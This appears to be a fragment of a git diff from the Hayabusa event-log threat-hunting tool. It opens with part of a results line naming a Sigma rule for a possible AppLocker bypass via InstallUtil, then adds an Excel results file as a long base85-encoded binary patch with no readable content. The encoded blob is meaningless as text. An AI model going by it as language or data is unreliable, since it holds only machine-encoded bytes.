Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary 
Proxy Execution InstallUtil/sysmon.evtx \ No newline at end of file diff --git a/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.xlsx b/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.xlsx new file mode 100644 index 0000000000000000000000000000000000000000..96bbd972840907d397dfac880573fc8375556723 GIT binary patch literal 711827 zcmeFYbyQqUx-SgDoj`y%tCv&JSn zS0RSVv+v)9$E+gS@+-Qt;Jr?Yx%op%&<*bEbOI<}Io{Bm2iKngvkGggYX88_235=u zzwQ=@{tG^ij;=krW+LJ!du^@5v}Z5GUJ@G^gndYai?^$3R|QEdi^~>~m=O?)`mQF= zbZI<1fw7i*!tni*1zomkHAKnFhiB(cx9d+@UgP$(P|Mc20%*#dlO3s4tCh} z|IzXPVh;Yx)UzUo06JoRIRyWFvv#v%4Mt7RZlKJX$7RMb#JdQe=~Rglzc@EWMU*r{ z;qO!w^|?1`NX%7fv<+=+E(*DGAkZ!(zo4Gv1mRw1?ExBsZ;Xk8lYVPe<52B>9N$DzS4dyaY7G{Mp^3VX zq=&y}FTbMtlZ#}xA`y$19@)a;Gq~xvnlyafoX<*gBWq0l2hw)L%H=uO)uE|r14Q8O zbfJQ-p4#T)BqGfkMChX zW59@)-DucLsbu}mv?+EExK+kiDnG&~KLQj+|s z`^3|@)h|jQNBWHmB7RGGdc|x4>YUW=B|jUd$%l916KZ!wLL}^p(n3aF$@S#4i#te> z>lJ{WA(N>+*WUgiutT^`KSW^?&z+{r+0mqddwwPo2tDn&Z9mU7&_F&*6#LW{=KXJ6;2Izw(a zI_wK{$(D@HN`%PDyhEsxhdkF$P7jgSR{VQ8fRz6oI|c=sT+#?|a4%5c;BbH%0CxTr zHCYfHn;Fh$-lKBvO4CP zh+jD_lTN%gg%~n%oFY9gbYG+!`-2(8$m8U*UoX&aT|<{~B1~Chm$7wC=|S2lzGagfv#B2#FLxf!(UUzoEKr{!ZO+XGk4OW z^-{OIU}^N-fCH3DK00W$iV)qI)97s{22`+M4R5X_hCS~S-7ghoFU=THHAysj4Qe9i zkOpyFs#3#0SHgUhjlr``bn&%(bi2+B0JM3lv(ii6XbJT_yZpuhtQXFFLvkl7r0$ z#v3CQx34j}oWK4|BJqet?;ArrGs@?^o&H?XYffj+PnRW!+O`^S8apGGzh1doM34F! ze3hV4*Z4%FN^#l!8CHXc3x%p^58G5l9V=U)g;Lu?L4LVN-?Q$?hNV}`=>p%7^H84q zMpnd^^heF~2XM*YHt~v~l^Fgi?#H@U6tCHds+1M_{=rdBGba7_a7KR}4n2HgtMp7( zX~+`CxXgDNBm|a*ZkLldOn5l58gyOl{nlI0d$bA{nM10$ujgLbDQ_x}`EUZv?0Dk` zpZIVw$L~?A|8sxFpkgXdm~g%db@>7FHW*(Yfg7;Ugtog)2w~q%&PaJPM^HBPH4BG{y}{E z9{1yy#&F%a54bP4zm#p~2_FwTiX4p#i%fSn4dgWsF*euy@F|zuO^O?~)hl#l#ar8c z+ai&g8+K}EfkVqqtE5Nfca}M^(4~;vm*G%}tGML=-3}%>=nWaUt>D4I<%-OibMgjx zKP1*JGz)!Cinv@`MMG;4_xTw9^U2ocQ@WyIWGD$_~F&UTN`@ohvfrA}~C?2==2Vz1Imq|Lj`3+ggI&UhCz=_Ct

eqAk_RbE_gj^PJN)UC|S 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 